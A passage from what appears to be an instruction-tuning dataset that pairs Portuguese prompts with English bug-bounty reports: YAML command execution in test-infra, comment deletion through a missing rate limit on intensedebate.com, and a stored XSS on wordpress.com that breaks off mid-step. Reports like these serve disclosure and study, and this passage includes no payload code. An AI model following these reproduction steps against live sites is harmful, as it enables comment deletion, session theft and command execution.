configuration file for Guberator, keep the same name.\n 3. Once you update the configuration the poc should be executed and a `ls` should be executed. \n\nTo Facilitate the process I have created a poc.py script in which I extracted the vulnerable code blocks from the test-infra repository to simulate the tools behaviour (Only from the main.py to illustrate the concept, same applies to the other occurence).\n\n### Impacto\nAn attacker can exploit this vulnerability by crafting a malicious YAML file in order to execute system commands. An attacker can either find a way to load a malicious configuration file or entice a victim into loading it. This results in Command Execution.\nFor this reason I have marked the `User Interaction` of the CVSS score as required." }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] No Rate Limit On The report Functionality Lead To Delete Any Comment When it is enabled", "input": "", "output": "### Resumo da Vulnerabilidade\nI have found a no rate limit issue on the report functionality.\nWhen you enabled the report functionality on your site, you can set a number of reports before deleting the comment reported.\nBy default, this functionality is unable, but if you enabled this and you set a $x number of reports before deleting the comment, an attacker can spamming this functionality and delete your comment.\n\n### Passos para Reproduzir\n1) Login at `https://intensedebate.com`\n2) Create your own site at `https://intensedebate.com/install`, and follow the instructions (use generic install)\n3) After setup your site, go to `https://www.intensedebate.com/user-dashboard`, on click to `Moderate`.\n\n {F1106120}\n\n4) Go to the comment setting by clicking to `Comments`\n\n{F1106122}\n\n5) Setup the Report functionality by checked the `Enable \"Report this comment\" button` and set a number of reports before deleting the comment to `10` and save it\n\n{F1106130}\n\n6) Go to your site and add a comment\n7) With a other account go to your site, and report the comment manually x10 \n8) After spam the Report functionality\n9) Refresh the page, and you will see the comment is deleted\n\n### Impacto\nDelete any comment in any site when the report functionality is enabled" }, { "instruction": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Stored XSS in wordpress.com", "input": "", "output": "### Resumo da Vulnerabilidade\nHello Team,\nI found the Stored XSS vulnerability in the Custom Style section, this vulnerability can result in an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, performing requests in the name of the victim or for phishing attacks, by inviting the victim to become part of the manager or administrator.\n\n### Passos para Reproduzir\n1. As an attacker, go to the feedback section, then go to the Polling section.\n2. Add a new post or edit an existing post.\n3. Scroll down, click All Styles.\n4. Add a new Style.\n5. Named the temporary style, click Save Style.\n6. Change the Style Name with